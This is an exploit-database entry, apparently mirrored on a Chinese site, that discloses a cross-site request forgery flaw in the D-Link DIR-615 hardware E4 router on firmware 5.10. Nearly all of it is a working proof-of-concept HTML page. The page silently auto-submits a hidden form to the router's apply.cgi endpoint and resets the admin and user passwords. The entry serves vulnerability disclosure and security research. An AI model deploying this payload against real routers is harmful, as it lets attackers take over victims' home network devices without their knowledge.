D-Link DIR-615 vE4 Firmware 5.10 – Cross-Site Request Forgery

  • 作者: Dhruv Shah
    日期: 2014-02-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/31764/
  • ####################################################################################
    
    # Exploit Title: Dlink DIR-615 Hardware Version E4 Firmware Verion 5.10
    CSRF Vulnerability
    # Google Dork: N/A
    # Date: 19/02/2014
    # Exploit Author: Dhruv Shah
    # Vendor Homepage:
    http://www.dlink.com/us/en/home-solutions/connect/routers/dir-615-wireless-n-300-router
    # Software Link: N/A
    # Hardware Version:E4
    
    # Firmware Version:5.10
    # Tested on: Router Web Server
    # CVE : N/A
    
    ###################################################################################
    
    Cross Site Request Forgery
    
    This Modem's Web Application , suffers from Cross-site request forgery
    
    through which attacker can manipulate user data via sending him malicious
    
    craft url.
    
    The Modems's Applicationnot using any security token to prevent it
    
    against CSRF. You can manipulate any userdata. PoC and Exploit to change
    
    user password:
    
     In the POC the IP address in the POST is the modems IP address.
    
    
    
    <html>
    
    <body>
    
    <form id ="poc"action="http://192.168.0.1/apply.cgi"
    method="POST">
    
    <input type="hidden" name="html_response_page"
    value="back.asp" />
    
    <input type="hidden" name="html_response_message"
    value="The setting is saved." />
    
    <input type="hidden" name="html_response_return_page"
    value="login.asp" />
    
    <input type="hidden" name="reboot_type" value="none" />
    
    <input type="hidden" name="button1" value="Save Settings" />
    
    <input type="hidden" name="admin_password" value="test" />
    
    <input type="hidden" name="admin_password1" value="test" />
    
    <input type="hidden" name="admPass2" value="test" />
    
    <input type="hidden" name="user_password" value="test" />
    
    <input type="hidden" name="user_password1" value="test" />
    
    <input type="hidden" name="usrPass2" value="test" />
    
    <input type="hidden" name="hostname" value="DIR-615" />
    
    <input type="hidden" name="graphical_enable" value="1" />
    
    <input type="hidden" name="graph_auth_enable" value="1" />
    
    <input type="hidden" name="remote_http_management_enable"
    value="0" />
    
    <input type="hidden"
    name="remote_http_management_inbound_filter"
    value="Allow_All" />
    
    </form>
    
    </body>
    
    <script
    type="text/javascript">document.getElementById("poc").submit();</script>
    
    </html>
    
    ______________________
    
    *Dhruv Shah* *aka Snypter*
    
    Blogger | Researcher | Consultant | Writer
    Youtube <http://www.youtube.com/snypter> |
    Facebook<http://www.facebook.com/dhruvshahs>|
    Linkedin <http://in.linkedin.com/pub/dhruv-shah/26/4a6/aa0> |
    Twitter<https://twitter.com/Snypter>|
    Blog <http://security-geek.in/blog/>